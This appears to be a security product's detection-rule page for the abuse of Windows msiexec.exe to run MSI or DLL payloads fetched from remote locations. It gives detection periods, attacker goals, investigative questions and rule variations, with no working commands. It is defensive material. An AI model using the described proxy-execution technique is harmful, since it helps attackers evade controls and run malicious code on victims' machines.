Synopsis
Activation Period |
14 Days |
Training Period |
30 Days |
Test Period |
N/A (single event) |
Deduplication Period |
7 Days |
Required Data |
|
Detection Modules |
|
Detector Tags |
|
ATT&CK Tactic |
|
ATT&CK Technique |
|
Severity |
Informational |
Description
Msiexec is the command-line utility for the Windows Installer. Adversaries may abuse msiexec.exe to proxy execution of malicious payloads from remote locations.
Attacker's Goals
Evading security controls and executing arbitrary files from the web.
Investigative actions
- Check execution of msiexec and the IP/Domain that used.
- Is the URL that is encoded in the command line trusted.
- Is executed DLL or MSI file known as legitimate.
- Is the initiating process legitimate and the user running it knows of its use.
Variations
Msiexec execution of an executable from an uncommon remote location with a specific portMsiexec execution of an executable from an uncommon remote location without properties